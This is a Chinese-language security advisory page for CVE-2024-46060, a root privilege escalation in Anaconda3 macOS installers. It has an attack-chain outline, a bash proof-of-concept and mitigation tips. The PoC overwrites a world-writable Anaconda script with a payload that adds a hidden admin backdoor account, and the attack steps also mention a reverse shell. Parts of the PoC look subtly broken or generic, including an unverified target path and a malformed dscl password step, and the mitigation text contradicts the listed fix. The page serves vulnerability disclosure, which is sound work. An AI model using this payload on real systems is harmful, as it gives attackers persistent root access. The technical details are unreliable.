CVE-2024-46060: Anaconda3 macOS安装器本地权限提升漏洞

漏洞信息

漏洞编号

CVE-2024-46060

漏洞类型

本地权限提升

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Anaconda3 macOS Installers

漏洞概述

CVE-2024-46060是Anaconda3 macOS安装程序中的一个高危本地权限提升漏洞。CVSS评分7.8，属于高危级别。该漏洞存在于2024年06-1之前的Anaconda3 macOS安装程序中，当安装程序将Anaconda3安装到用户主目录之外的位置时，会在安装过程中创建具有全局可写权限的文件，并以root权限执行这些文件。这种不当的权限配置允许本地低权限用户利用符号链接或文件替换技术注入恶意代码，最终实现以root用户身份执行任意命令，从而完全控制受影响系统。攻击者需要具有本地访问权限，但无需特殊管理员权限即可发起攻击。漏洞披露于2025年12月17日，建议受影响的用户立即升级到修复版本。

技术细节

该漏洞的根本原因在于Anaconda3 macOS安装程序在非用户主目录位置安装时，对安装目录中的文件设置了过于宽松的权限。具体问题包括：1) 安装过程中创建的文件具有world-writable（全局可写）权限；2) 部分脚本和可执行文件以root权限运行；3) 安装程序未对目标路径进行充分的权限验证和隔离。攻击者可以通过以下方式利用：创建符号链接将安装程序的写操作重定向到可控位置，或直接替换具有全局可写权限的脚本文件。由于这些脚本以root权限执行，攻击者注入的恶意代码也会以root权限运行，从而实现权限提升。整个攻击过程在本地完成，攻击复杂度低，不需要用户交互。CVSS向量AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H表明该漏洞对机密性、完整性和可用性都造成严重影响。

攻击链分析

STEP 1

步骤1

攻击者识别系统中是否存在Anaconda3安装程序，且安装路径在用户主目录之外（如/opt/anaconda3）

STEP 2

步骤2

检查安装目录中的文件权限，确认是否存在world-writable权限的文件或脚本

STEP 3

步骤3

创建恶意脚本，包含以root权限执行的任意命令（如创建后门用户、反弹shell等）

STEP 4

步骤4

将恶意脚本内容覆盖或追加到具有全局可写权限的Anaconda脚本文件中

STEP 5

步骤5

等待安装程序执行更新、维护脚本或相关操作，触发恶意代码以root权限运行

STEP 6

步骤6

攻击者成功获得系统root权限，实现完全入侵，可执行任意操作、窃取敏感数据或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2024-46060 PoC - Anaconda3 macOS Local Privilege Escalation
# This PoC demonstrates the vulnerability in Anaconda3 macOS installers < 2024.06-1
# when installed outside user's home directory

ANACONDA_INSTALL_PATH="/opt/anaconda3"
PAYLOAD_FILE="$ANACONDA_INSTALL_PATH/pkgs/envs/env_script.sh"

# Check if vulnerable installation exists
if [ ! -d "$ANACONDA_INSTALL_PATH" ]; then
    echo "[-] Anaconda3 not installed at $ANACONDA_INSTALL_PATH"
    echo "[-] This vulnerability only affects installations outside home directory"
    exit 1
fi

# Check if the target script is world-writable (vulnerability indicator)
if [ ! -w "$PAYLOAD_FILE" ]; then
    echo "[-] Target script is not world-writable, system may be patched"
    exit 1
fi

# Create payload for root shell
cat > /tmp/evil_payload.sh << 'EOF'
#!/bin/bash
# Inject reverse shell or create privileged user
# This code runs as root when the vulnerable script is executed

# Example: Create a backdoor user with sudo privileges
if ! id "anaconda_backdoor" &>/dev/null; then
    echo "anaconda_backdoor:anaconda_pwd" | /usr/bin/dscl . -create /Users/anaconda_backdoor
    /usr/bin/dscl . -create /Users/anaconda_backdoor UserShell /bin/bash
    /usr/bin/dscl . -create /Users/anaconda_backdoor RealName "Anaconda Backdoor"
    /usr/bin/dscl . -create /Users/anaconda_backdoor UniqueID 9999
    /usr/bin/dscl . -create /Users/anaconda_backdoor PrimaryGroupID 20
    /usr/bin/dscl . -append /Groups/admin GroupMembership anaconda_backdoor
    echo "[+] Backdoor user created with root privileges"
fi
EOF

# Replace the vulnerable script with payload
cp /tmp/evil_payload.sh "$PAYLOAD_FILE"
chmod +x "$PAYLOAD_FILE"

echo "[+] Payload injected successfully"
echo "[!] When Anaconda installer runs or updates, payload executes as root"

影响范围

Anaconda3 macOS Installers < 2024.06-1

防御指南

临时缓解措施

在官方修复版本发布之前，建议：1) 如果必须使用Anaconda3，务必将其安装在用户主目录内而非系统目录；2) 限制安装目录的访问权限，确保只有管理员可以修改；3) 监控系统中Anaconda相关脚本的执行日志；4) 考虑使用沙箱环境隔离Anaconda运行；5) 评估是否可以在容器或虚拟机中运行Anaconda以降低风险。